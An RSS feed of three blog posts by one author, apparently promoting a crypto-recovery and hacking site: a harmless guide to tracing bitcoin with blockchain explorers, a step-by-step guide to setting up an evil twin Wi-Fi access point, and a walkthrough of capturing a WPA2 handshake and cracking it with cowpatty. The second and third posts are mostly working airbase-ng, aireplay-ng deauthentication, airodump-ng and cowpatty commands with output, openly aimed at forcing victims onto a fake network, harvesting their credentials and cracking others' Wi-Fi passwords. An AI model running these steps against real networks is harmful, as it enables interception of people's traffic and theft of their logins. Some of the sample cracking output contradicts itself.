<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: TheScott12</title>
    <description>The latest articles on DEV Community by TheScott12 (@thescott12).</description>
    <link>https://dev.to/thescott12</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1094357%2Fc514bf3f-6402-4a9b-a6cb-3af6665656c7.png</url>
      <title>DEV Community: TheScott12</title>
      <link>https://dev.to/thescott12</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/thescott12"/>
    <language>en</language>
    <item>
      <title>Y3llowl4bs: Cryptocurrency scam investigation | Recover stolen bitcoin</title>
      <dc:creator>TheScott12</dc:creator>
      <pubDate>Sun, 04 Jun 2023 00:11:04 +0000</pubDate>
      <link>https://dev.to/thescott12/y3llowl4bs-cryptocurrency-scam-investigation-recover-stolen-bitcoin-3ki4</link>
      <guid>https://dev.to/thescott12/y3llowl4bs-cryptocurrency-scam-investigation-recover-stolen-bitcoin-3ki4</guid>
      <description>&lt;p&gt;&lt;a href="https://y3llowl4bs.com/report-crypto-scams/"&gt;Bitcoin Investigations - How to trace bitcoin addresses. &lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bitcoin offers a unique opportunity for financial investigation in that an amateur can easily research a given person’s bitcoin usage. The most basic framework of financial investigation consists of identifying a target, searching for negative information about them or their past, identifying the target’s associates, and then searching for negative information on them. Bitcoin lends itself perfectly to this kind of investigation.&lt;/p&gt;

&lt;p&gt;Background information on bitcoin&lt;/p&gt;

&lt;p&gt;For those that have no knowledge of bitcoin here is the necessary background information before we start. Bitcoin is only one of many cryptocurrencies. For the purposes of this post, we will focus only on bitcoin. Bitcoin, by design, makes the person anonymous but all of their financial transactions are public.&lt;/p&gt;

&lt;p&gt;If, for example, someone named Asma wants bitcoin she must get a “wallet,” which will contain one or several bitcoin “addresses.” An address can hold money, send money to another address, and receive money. Asma’s bitcoin activity is public, but her name and identity are theoretically anonymous.&lt;/p&gt;

&lt;p&gt;In a scenario where we are given a specific bitcoin address (whether it is anonymous or owned by a known business associate), the following are steps that we can take to investigate and trace bitcoin addresses.&lt;/p&gt;

&lt;p&gt;**&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a href="https://y3llowl4bs.com/report-crypto-scams/"&gt;How to trace bitcoin addresses&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;**&lt;/p&gt;

&lt;h2&gt;
  
  
  Blockchain
&lt;/h2&gt;

&lt;p&gt;The Blockchain itself is complex and beyond the scope of this post, but its website, Blockchain, is a useful tool. The site allows one to look up a bitcoin address and see all of its past financial transactions in addition to how much currency it currently owns. Every transaction, each time the bitcoin address sent or received money, is listed along with the date, the amount of money transferred, as well as the bitcoin addresses that sent and received the money.&lt;/p&gt;

&lt;p&gt;Below is an example of how one transaction is displayed on Blockchain.com.&lt;/p&gt;

&lt;p&gt;This may appear confusing but it is quite simple if you know what you are looking at. Below is the same transactions but I put colored rectangles in the photo to make it more easily understood. Each transaction has a unique string of numbers and letters (in the red rectangle below) that identifies a specific transaction. This transaction ID is known as a “hash.” Bear in mind that in other contexts, the word hash is used differently.&lt;/p&gt;

&lt;p&gt;The bitcoin addresses are also identified by random strings of numbers and letters. The string in the orange rectangle is the ID for a bitcoin address. The address in orange is sending money to a second address that is in a green rectangle. The orange address is sending 0.1988 bitcoin. Note that the acronym used in the photo “BTC” just means bitcoin. A small amount of the bitcoin will go to a fee (seen below the orange address) and the remainder will go to the green address.&lt;/p&gt;

&lt;p&gt;The number to the write of the green address is the amount received after the fee. And finally on the top right is the date and time of the transaction. For further investigation click on the green address to see what happened with the money next, or click on the orange address to try to find where the money came from.&lt;/p&gt;

&lt;p&gt;Note that bitcoin has “exchanges” where people buy and sell bitcoins. If you find a bitcoin address that has conducted hundreds of thousands of transactions, it is probably owned by exchange, not a person. If you want to be sure try googling the bitcoin address because many exchanges publicly identify their addresses.&lt;/p&gt;

&lt;h2&gt;
  
  
  Use Wallet Explorer to find other wallets
&lt;/h2&gt;

&lt;p&gt;Each bitcoin address is contained in a wallet that may have more addresses. Walletexplorer allows one to find the wallet containing the address of interest (the wallet has its own unique number to identify it). This site also allows one to find if there are other addresses in the same wallet. If there are other addresses in the same wallet this means that the person that same person owns the wallet and all of the addresses in it. Therefore, finding the wallet is a great way to find if the owner of one address is also the owner of others.&lt;/p&gt;

&lt;h2&gt;
  
  
  OXT
&lt;/h2&gt;

&lt;p&gt;Another interesting blockchain explorer is the “open exploration tool” (OXT), an exploratory blockchain analysis tool. Just like any other blockchain explorer OXT can display transactions happening on the Bitcoin network. However, the website also analyzes different types of behavior on the Bitcoin blockchain using various charting and plotting tools. This includes temporal charts covering fees, transactions, scripts, and more. OXT also offers to scatter plots as well giving a different perspective on transaction and bitcoin address behavior.&lt;/p&gt;

&lt;p&gt;Other popular blockchain explorers that provide similar transaction data and some charts include Blockcypher, Insight, Blocktrail, and Sochain. Each explorer shows blockchain data a little different but more or less contains the same information about transactions.&lt;/p&gt;

&lt;p&gt;Network Statistics Charts and Plotting Tools&lt;/p&gt;

&lt;h2&gt;
  
  
  Grafana
&lt;/h2&gt;

&lt;p&gt;The website Statoshi.info has a lot of real-time Bitcoin network statistics. The website’s individual dashboards show node counts, bandwidth usage, fee estimates, system metrics, mempool data, and more. Grafana has been around for a few years now, and each dashboard display shows various charts that analyze particular sections of the network and protocol’s behavior.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bitcoin Wisdom
&lt;/h2&gt;

&lt;p&gt;Bitcoin Wisdom is also another charting website that’s been around for quite some time. The website’s price charts are one of the most popular sections within the web portal. Bitcoin Wisdom’s price charts display various exchanges including Bitstamp, BTCC, Kraken, Bitfinex, and more. Furthermore, Bitcoin Wisdom also shows other statistical data such as network difficulty, and the past and present hash rate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Tradeblock
&lt;/h2&gt;

&lt;p&gt;Another website that reports statistical Bitcoin network data includes Tradeblock. The Tradeblock engine offers a wide variety of graphical charts displaying both historical and current Bitcoin statistics. The website’s interface displays the mempool count, blocks mined, transaction count, and many more useful network diagrams. Tradeblock also monitors the Ethereum blockchain and has its own blockchain explorers as well.&lt;/p&gt;

&lt;h2&gt;
  
  
  Blockseer
&lt;/h2&gt;

&lt;p&gt;Blockseer is another exploratory blockchain tool that wants users to “follow the bitcoin.” The tool shows a visual interpretation of transactions on the network alongside the connections each transaction has with individual addresses. The site traces bitcoin origins and follows the path of bitcoins traveling throughout the blockchain using a visual diagram.&lt;/p&gt;

&lt;h2&gt;
  
  
  Websites That Track Nodes
&lt;/h2&gt;

&lt;h2&gt;
  
  
  Node Counter
&lt;/h2&gt;

&lt;p&gt;Node Counter is an analytical website that tracks Bitcoin nodes throughout the network. This includes Bitcoin Classic, Bitcoin Unlimited (BU), XT, and Core nodes in a graphical setting. Each table shows various nodes within the network alongside pools signaling alternate Bitcoin clients and block size proposals. Node counter displays data using both line graphs and pie charts as well.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bitnodes
&lt;/h2&gt;

&lt;p&gt;21 Inc’s Bitnodes is another popular node tracking website that displays various charts and graphs concerning Bitcoin network nodes. The site gives a current network snapshot and also a search engine to check on node status. Bitnodes also displays Classic, BU, Core, and XT nodes within the network.&lt;/p&gt;

&lt;h2&gt;
  
  
  Coin Dance
&lt;/h2&gt;

&lt;p&gt;Last but not least in the node counting realm is the website Coin Dance which shows various summaries and charts concerning nodes across the network. The graphical interface also charts the different node implementations like Core and XT with many types of charts. Furthermore, Coin Dance is a popular site for many other statistics such as Localbitcoins and Paxful volumes, and even charts on political opinions in regards to Segregated Witness, Emergent Consensus, and the most recent UASF (BIP 148) support from well-known industry businesses.&lt;/p&gt;

&lt;h2&gt;
  
  
  Visualizing the Bitcoin Network, Just Got a Whole Lot Easier
&lt;/h2&gt;

&lt;p&gt;All of these monitoring websites offer a different view of the network, and each one has various merits depending on what you’re looking for. The information these tools provide can improve our relationship with the network by getting a better understanding of what’s going on. A graphical display is sometimes a better method for people interpreting network activity and the protocol's behavior.&lt;/p&gt;

&lt;p&gt;The Internet of Money’s transaction value lookup where users can look up the value of a transaction in the past.&lt;/p&gt;

&lt;p&gt;The Internet of Money also has a tool section and various statistical information that can be found on our website as well. Using our transaction value lookup tool simply add a bitcoin transaction TXID and find it’s price in the past. For those who are extremely passionate about the subject of Bitcoin, there’s plenty of statistics and information to gather each and every day.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>scams</category>
      <category>bitcoin</category>
      <category>investigation</category>
    </item>
    <item>
      <title>How to Create an Evil Twin Access Point; Step-by-Step Guide</title>
      <dc:creator>TheScott12</dc:creator>
      <pubDate>Sat, 03 Jun 2023 23:41:39 +0000</pubDate>
      <link>https://dev.to/thescott12/how-to-create-an-evil-twin-access-point-step-by-step-guide-2chn</link>
      <guid>https://dev.to/thescott12/how-to-create-an-evil-twin-access-point-step-by-step-guide-2chn</guid>
      <description>&lt;p&gt;&lt;a href="https://y3llowl4bs.com/how-to-create-an-evil-twin-or-fake-access-point/"&gt;Step-by-Step Guide: Creating an Evil Twin&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;An Evil Twin Access Point is a malicious wireless access point that is set up to mimic a legitimate one. It can be used to intercept sensitive information such as login credentials, credit card information, and other private data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;In this post, I will provide a step-by-step guide on how to create an Evil Twin Access Point. You will learn how to set up a fake access point that looks like the real one, and how to intercept data from unsuspecting victims.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Follow our guide and learn how to create an Evil Twin Access Point in just a few easy steps.&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;What is an Evil Twin Access Point?&lt;br&gt;
*&lt;/em&gt;&lt;br&gt;
An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.&lt;/p&gt;

&lt;p&gt;Devices connecting to a Wi-Fi network like laptops, tablets, and smartphones have no way to distinguish between two Wi-Fi networks with the same SSID name. This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;Enable Monitor Mode&lt;br&gt;
*&lt;/em&gt;&lt;br&gt;
To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.&lt;/p&gt;

&lt;p&gt;Aircrack-ng is a popular set of tools used to crack wireless networks. It is a suite of tools that includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for setting up monitor mode on wireless cards), and airodump-ng (for capturing wireless traffic).&lt;/p&gt;

&lt;p&gt;Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it's functioning correctly by entering the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airmon-ng check kill

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.&lt;/p&gt;

&lt;p&gt;The next step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airmon-ng start wlan0

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;Locate the Target Wireless Network&lt;br&gt;
*&lt;/em&gt;&lt;br&gt;
The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.&lt;/p&gt;

&lt;p&gt;Create the Evil Twin&lt;/p&gt;

&lt;p&gt;Once you’ve found the network which you wish to clone, run the following command in another terminal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airbase-ng -a 28:EF:01:35:34:85 –e SkyNet -c 6 wlan0mon
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan0mon to 1800
21:39:29  Access Point with BSSID 28:EF:01:35:34:85 started.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command creates an Evil Twin network with the SSID name SkyNet, however, it will not be able to provide internet access yet.&lt;/p&gt;

&lt;p&gt;Provide Internet Access to the Evil Twin&lt;/p&gt;

&lt;p&gt;I will add the bridge interface, called fake, you can name it any way you like.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;brctl addbr fake

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;brctl addif fake eth0
brctl addif fake at0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Assign IP addresses to the interface and bring them up using ifconfig:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ifconfig at0 0.0.0.0 up
ifconfig fake up
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can take a look at the bridge network interface with ifconfig:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ifconfig
at0       Link encap:Ethernet  HWaddr 74:85:2a  
inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500 
RX bytes:540 (540.0 B)  TX bytes:54845 (53.3 KiB)
eth0 Link encap:Ethernet HWaddr c8:bc:c8
inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::cabc:a6c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:640 errors:0 dropped:0 overruns:0 frame:0
TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB)
Interrupt:17
fake Link encap:Ethernet HWaddr 74:85:2a
inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80:::fe97:5b08/64 Scope:Link
inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:859 errors:0 dropped:0 overruns:0 frame:0
TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;*&lt;em&gt;Kick Wireless Clients from the Legitimate AP&lt;br&gt;
*&lt;/em&gt;&lt;br&gt;
The next step is to kick wireless clients off the legitimate AP, in my case, that’s SkyNet network. You can do this by using aireplay-ng.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.&lt;/p&gt;

&lt;p&gt;As you can see in the output below, a client has associated with my evil twin. This information is found in the airebase-ng terminal (client 28:EF:01:23:46:68 associated).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56  Created tap interface at0
14:50:56  Trying to set MTU on at0 to 1500
14:50:56  Trying to set MTU on wlan5 to 1800
14:50:56  Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At this point, all the victim’s traffic is going through the attacker’s machine, he or she can capture sensitive information since it’s technically a Man-in-the-Middle attack.&lt;/p&gt;

&lt;p&gt;The attacker can perform various attacks like DNS spoofing which redirects the victim to a cloned or fake login page. Once the victim tries to login, the hacker harvests the credentials.&lt;/p&gt;

&lt;p&gt;Conclusion&lt;/p&gt;

&lt;p&gt;In today's digital age, using public Wi-Fi networks has become a common practice for many people. However, it's important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.&lt;/p&gt;

</description>
      <category>network</category>
      <category>networking</category>
      <category>wifi</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>How to Speed up the WPA/WPA2 Password Cracking Process using Cowpatty</title>
      <dc:creator>TheScott12</dc:creator>
      <pubDate>Sat, 03 Jun 2023 23:27:32 +0000</pubDate>
      <link>https://dev.to/thescott12/how-to-speed-up-the-wpawpa2-password-cracking-process-using-cowpatty-52b3</link>
      <guid>https://dev.to/thescott12/how-to-speed-up-the-wpawpa2-password-cracking-process-using-cowpatty-52b3</guid>
      <description>&lt;p&gt;Requirements:&lt;/p&gt;

&lt;p&gt;Kali Linux Operating System.&lt;/p&gt;

&lt;p&gt;Handshake File of the Network that You Want to &lt;a href="//y3llowl4bs.com"&gt;Hack&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Wordlist.&lt;/p&gt;

&lt;p&gt;Cowpatty, by Joshua Wright, is a tool that automates offline dictionary attacks for cracking WPA2-PSK passwords. Cowpatty supports using a pre-computed hash file rather than a plain-text word file.&lt;/p&gt;

&lt;p&gt;This can speed up the obtaining process of the “lost” WPA/WPA2 key of your access point. Pre-computed hash files are used to accelerate password brute force when cracking WPA.&lt;/p&gt;

&lt;p&gt;They do this by eliminating the need to perform the costly transformation of a password into an encryption key.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cowpatty
&lt;/h2&gt;

&lt;p&gt;To get a brief rundown of the options, type cowpatty in the terminal:&lt;/p&gt;

&lt;p&gt;cowpatty&lt;br&gt;
cowpatty 4.8 - WPA-PSK dictionary attack.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Kali Linux will provide you with a brief help screen. Cowpatty requires all of the following:&lt;/p&gt;

&lt;p&gt;**A word list.&lt;/p&gt;

&lt;p&gt;A file where the password hash has been captured.&lt;/p&gt;

&lt;p&gt;The SSID of the target AP.&lt;br&gt;
**&lt;br&gt;
Put the Wireless Adapter in Monitor Mode&lt;/p&gt;

&lt;p&gt;You need to put the wireless adapter into monitor mode by typing&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airmon-ng start wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;(assuming your interface name is wlan0).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airmon-ng start wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command will change your wireless interface name to wlan0mon.&lt;/p&gt;

&lt;h2&gt;
  
  
  Find The Target
&lt;/h2&gt;

&lt;p&gt;Start scanning nearby wireless routers using your monitor interface:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Capture the Handshake
&lt;/h2&gt;

&lt;p&gt;Next, you need to start capturing the 4-way handshake file where the hashed password will be stored.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng — bssid 28:EF:01:35:34:85 -c 6 -w handshake wlan0mon

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will start a dump on the selected AP (28:EF:01:35:34:85), on the selected channel (-c 6), and save the hash in a file named handshake.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 39 100 51 0 0 6 54 WPA2 CCMP PSK SkyNet

BSSID STATION PWR Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If someone connects to the AP, I will capture the hash and airodump-ng will show me it has been captured in the upper right-hand corner (WPA handshake: 28:EF:01:35:34:85).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Run Cowpatty
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now that I have the hash of the password, I can use it with cowpatty and the wordlist to crack the hash.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cowpatty -f wordlist.txt -r handshake-01.cap -s SkyNet
cowpatty 4.8 - WPA-PSK dictionary attack. &amp;lt;jwright@hasborg.com&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Collected all necessary data to mount crack against WPA2/PSK passphrase.&lt;br&gt;
Starting dictionary attack. Please be patient.&lt;br&gt;
key no. 1000: angelgirl&lt;br&gt;
key no. 2000: missouri&lt;br&gt;
key no. 3000: birdsong&lt;/p&gt;

&lt;p&gt;The PSK is "justletmein".&lt;/p&gt;

&lt;p&gt;2000 passphrases tested in 294.42 seconds: 50000.00 passphrases/second&lt;/p&gt;

&lt;p&gt;Cowpatty is generating a hash of every word on the wordlist with the SSID as a seed and compares it to the captured hash. When the hashes match, it displays the password of the AP. This process is very CPU intensive and slow.&lt;/p&gt;

&lt;p&gt;Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password much faster.&lt;/p&gt;

&lt;p&gt;You can generate your own hashes for the target SSID using a tool called genpmk.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;genpmk -f wordlist.txt -d hash -s SkyNet
genpmk 1.3 - WPA-PSK precomputation attack. &amp;lt;jwright@hasborg.com&amp;gt;
File cowpatty_dict does not exist, creating.
key no. 1000: pinkgirl
key no. 2000: lovecandy
key no. 3000: steve2006
key no. 4000: honeycow
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;2641 passphrases tested in 4.60 seconds: 451.00 passphrases/second&lt;/p&gt;

&lt;p&gt;Once you have generated the hash for the particular SSID, you can then crack the password with cowpatty by typing:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cowpatty -d hash -r handshake-01.cap -s SkyNet

-d argument is for pre-calculated pmk hash name,

-r is for capture handshake file.

-s is for ESSID network name.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>tutorial</category>
      <category>linux</category>
      <category>opensource</category>
      <category>security</category>
    </item>
  </channel>
</rss>
